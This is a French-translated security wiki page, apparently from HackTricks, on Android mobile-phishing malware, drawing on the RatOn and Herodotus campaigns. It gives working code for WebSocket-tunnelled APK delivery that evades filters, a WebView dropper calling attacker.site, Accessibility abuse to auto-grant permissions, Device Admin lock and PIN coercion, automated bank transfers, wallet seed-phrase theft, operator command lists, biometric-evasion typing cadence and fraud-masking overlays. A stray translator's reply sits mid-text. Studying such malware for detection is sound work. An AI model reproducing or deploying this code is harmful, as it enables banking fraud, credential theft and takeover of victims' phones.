// Accumulate binary chunks and drive fake Play progress UI const chunks = []; socket.on(“chunk”, (chunk) => chunks.push(chunk)); socket.on(“downloadProgress”, (p) => updateProgressBar(p));

// Assemble APK client‑side and trigger browser save dialog socket.on(“downloadComplete”, () => { const blob = new Blob(chunks, { type: “application/vnd.android.package-archive” }); const url = URL.createObjectURL(blob); const a = document.createElement(“a”); a.href = url; a.download = “app.apk”; a.style.display = “none”; document.body.appendChild(a); a.click(); });

</details>

Pourquoi il échappe aux contrôles simples :
- Aucune URL .apk statique n'est exposée ; le payload est reconstruit en mémoire à partir des frames WebSocket.
- Les filtres URL/MIME/extensions qui bloquent les réponses directes .apk peuvent manquer les données binaires tunnelées via WebSockets/Socket.IO.
- Les crawlers et sandboxes d'URL qui n'exécutent pas WebSockets ne récupéreront pas le payload.

Voir aussi WebSocket tradecraft et tooling :

<a class="content_ref" href="../../pentesting-web/websocket-attacks.md"><span class="content_ref_label">WebSocket Attacks</span></a>


## Android Accessibility/Overlay & Device Admin Abuse, ATS automation, and NFC relay orchestration – Cas d'étude RatOn

La campagne RatOn banker/RAT (ThreatFabric) est un exemple concret de la façon dont les opérations modernes de mobile phishing combinent WebView droppers, Accessibility-driven UI automation, overlays/ransom, Device Admin coercion, Automated Transfer System (ATS), crypto wallet takeover, et même NFC-relay orchestration. Cette section synthétise les techniques réutilisables.

### Stage-1 : WebView → native install bridge (dropper)
Les attaquants affichent un WebView pointant vers une page malveillante et injectent une interface JavaScript qui expose un installateur natif. Un tap sur un bouton HTML appelle du code natif qui installe un APK de second étage inclus dans les assets du dropper, puis le lance directement.

Modèle minimal :

<details>
<summary>Stage-1 dropper minimal pattern (Java)</summary>
```java
public class DropperActivity extends Activity {
@Override protected void onCreate(Bundle b){
super.onCreate(b);
WebView wv = new WebView(this);
wv.getSettings().setJavaScriptEnabled(true);
wv.addJavascriptInterface(new Object(){
@android.webkit.JavascriptInterface
public void installApk(){
try {
PackageInstaller pi = getPackageManager().getPackageInstaller();
PackageInstaller.SessionParams p = new PackageInstaller.SessionParams(PackageInstaller.SessionParams.MODE_FULL_INSTALL);
int id = pi.createSession(p);
try (PackageInstaller.Session s = pi.openSession(id);
InputStream in = getAssets().open("payload.apk");
OutputStream out = s.openWrite("base.apk", 0, -1)){
byte[] buf = new byte[8192]; int r; while((r=in.read(buf))>0){ out.write(buf,0,r);} s.fsync(out);
}
PendingIntent status = PendingIntent.getBroadcast(this, 0, new Intent("com.evil.INSTALL_DONE"), PendingIntent.FLAG_UPDATE_CURRENT | PendingIntent.FLAG_IMMUTABLE);
pi.commit(id, status.getIntentSender());
} catch (Exception e) { /* log */ }
}
}, "bridge");
setContentView(wv);
wv.loadUrl("https://attacker.site/install.html");
}
}

Je n’ai reçu aucun contenu à traduire. Merci de coller ici le texte (le contenu du fichier src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md ou l’HTML de la page) et je le traduirai en respectant les consignes (ne pas traduire le code, les noms de techniques, les liens, les chemins ni les balises).

<button onclick="bridge.installApk()">Install</button>

Après l’installation, le dropper démarre le payload via package/activity explicite :

Intent i = new Intent();
i.setClassName("com.stage2.core", "com.stage2.core.MainActivity");
startActivity(i);

Hunting idea: untrusted apps calling addJavascriptInterface() and exposing installer-like methods to WebView; APK shipping an embedded secondary payload under assets/ and invoking the Package Installer Session API.

Entonnoir de consentement : Accessibility + Device Admin + follow-on runtime prompts

Stage-2 opens a WebView that hosts an “Access” page. Its button invokes an exported method that navigates the victim to the Accessibility settings and requests enabling the rogue service. Once granted, malware uses Accessibility to auto-click through subsequent runtime permission dialogs (contacts, overlay, manage system settings, etc.) and requests Device Admin.

• Accessibility programmatically helps accept later prompts by finding buttons like “Allow”/“OK” in the node-tree and dispatching clicks.
• Overlay permission check/request:

if (!Settings.canDrawOverlays(ctx)) {
Intent i = new Intent(Settings.ACTION_MANAGE_OVERLAY_PERMISSION,
Uri.parse("package:" + ctx.getPackageName()));
ctx.startActivity(i);
}

Voir aussi :

Accessibility Services Abuse

Overlay phishing/ransom via WebView

Les opérateurs peuvent émettre des commandes pour :

• afficher un overlay en plein écran depuis une URL, ou
• transmettre du HTML inline qui est chargé dans un overlay WebView.

Usages probables : coercition (saisie du PIN), ouverture de wallet pour capturer les PINs, messages de rançon. Conserver une commande pour vérifier/garantir que la permission d’overlay est accordée si elle manque.

Modèle de contrôle à distance – pseudo-écran texte + screen-cast

• Bande passante réduite : exporter périodiquement l’arbre de nœuds Accessibility, sérialiser les textes/roles/bounds visibles et envoyer au C2 comme pseudo-écran (commandes comme txt_screen pour une capture ponctuelle et screen_live en continu).
• Haute fidélité : demander MediaProjection et démarrer le screen-casting/enregistrement à la demande (commandes comme display / record).

ATS playbook (bank app automation)

À partir d’une tâche JSON, ouvrir l’application bancaire, piloter l’UI via Accessibility avec un mélange de requêtes par texte et de taps sur des coordonnées, et saisir le PIN de paiement de la victime lorsqu’il est demandé.

Exemple de tâche :

{
"cmd": "transfer",
"receiver_address": "ACME s.r.o.",
"account": "123456789/0100",
"amount": "24500.00",
"name": "ACME"
}

Exemples de textes observés dans un flux cible (CZ → EN):

• “Nová platba” → “Nouveau paiement”
• “Zadat platbu” → “Saisir le paiement”
• “Nový příjemce” → “Nouveau bénéficiaire”
• “Domácí číslo účtu” → “Numéro de compte national”
• “Další” → “Suivant”
• “Odeslat” → “Envoyer”
• “Ano, pokračovat” → “Oui, continuer”
• “Zaplatit” → “Payer”
• “Hotovo” → “Terminé”

Les opérateurs peuvent également vérifier/augmenter les limites de transfert via des commandes comme check_limit et limit qui naviguent de la même manière dans l’UI des limites.

Crypto wallet seed extraction

Cibles comme MetaMask, Trust Wallet, Blockchain.com, Phantom. Flux : déverrouiller (PIN volé ou mot de passe fourni), naviguer vers Security/Recovery, révéler/afficher la seed phrase, keylog/exfiltrate it. Implémentez des sélecteurs tenant compte de la locale (EN/RU/CZ/SK) pour stabiliser la navigation entre les langues.

Device Admin coercion

Les Device Admin APIs sont utilisées pour augmenter les opportunités de PIN-capture et frustrer la victime :

• Verrouillage immédiat :

dpm.lockNow();

• Expirer le credential actuel pour forcer le changement (Accessibility capture le nouveau PIN/password):

dpm.setPasswordExpirationTimeout(admin, 1L); // requires admin / often owner

• Forcer le déverrouillage non biométrique en désactivant les fonctionnalités biométriques du keyguard :

dpm.setKeyguardDisabledFeatures(admin,
DevicePolicyManager.KEYGUARD_DISABLE_FINGERPRINT |
DevicePolicyManager.KEYGUARD_DISABLE_TRUST_AGENTS);

Remarque : Beaucoup de contrôles DevicePolicyManager requièrent Device Owner/Profile Owner sur les versions récentes d’Android ; certaines builds OEM peuvent être laxistes. Validez toujours sur l’OS/OEM cible.

NFC relay orchestration (NFSkate)

Stage-3 peut installer et lancer un module NFC-relay externe (par ex., NFSkate) et même lui fournir un template HTML pour guider la victime pendant le relay. Cela permet des cash-out sans contact en mode card-present parallèlement à de l’ATS en ligne.

Background: NFSkate NFC relay.

Ensemble de commandes opérateur (exemple)

• UI/état: txt_screen, screen_live, display, record
• Social: send_push, Facebook, WhatsApp
• Overlays: overlay (inline HTML), block (URL), block_off, access_tint
• Wallets: metamask, trust, blockchain, phantom
• ATS: transfer, check_limit, limit
• Device: lock, expire_password, disable_keyguard, home, back, recents, power, touch, swipe, keypad, tint, sound_mode, set_sound
• Comms/Recon: update_device, send_sms, replace_buffer, get_name, add_contact
• NFC: nfs, nfs_inject

Accessibility-driven ATS anti-detection: human-like text cadence and dual text injection (Herodotus)

Les acteurs de menace combinent de plus en plus l’automatisation basée sur Accessibility avec des anti-détections ajustées contre les biométriques comportementales basiques. Un banker/RAT récent présente deux modes complémentaires de livraison de texte et un toggle opérateur pour simuler la frappe humaine avec une cadence aléatoire.

• Mode discovery : énumérer les nœuds visibles avec selectors et bounds pour cibler précisément les inputs (ID, text, contentDescription, hint, bounds) avant d’agir.
• Injection de texte duale :
• Mode 1 – ACTION_SET_TEXT directement sur le nœud cible (stable, sans clavier) ;
• Mode 2 – set du clipboard + ACTION_PASTE dans le nœud focalisé (fonctionne lorsque le setText direct est bloqué).
• Cadence humaine : diviser la chaîne fournie par l’opérateur et la livrer caractère par caractère avec des délais aléatoires de 300–3000 ms entre les événements pour échapper aux heuristiques de “machine-speed typing”. Implémenté soit en faisant croître progressivement la valeur via ACTION_SET_TEXT, soit en collant un caractère à la fois.

</details>

Overlays de blocage pour masquer la fraude :
- Afficher un `TYPE_ACCESSIBILITY_OVERLAY` plein écran avec une opacité contrôlée par l'opérateur ; le garder opaque pour la victime pendant que l'automatisation distante continue en dessous.
- Commandes généralement exposées : `opacityOverlay <0..255>`, `sendOverlayLoading <html/url>`, `removeOverlay`.

Overlay minimal avec alpha ajustable :
```java
View v = makeOverlayView(ctx); v.setAlpha(0.92f); // 0..1
WindowManager.LayoutParams lp = new WindowManager.LayoutParams(
MATCH_PARENT, MATCH_PARENT,
WindowManager.LayoutParams.TYPE_ACCESSIBILITY_OVERLAY,
WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE |
WindowManager.LayoutParams.FLAG_NOT_TOUCH_MODAL,
PixelFormat.TRANSLUCENT);
wm.addView(v, lp);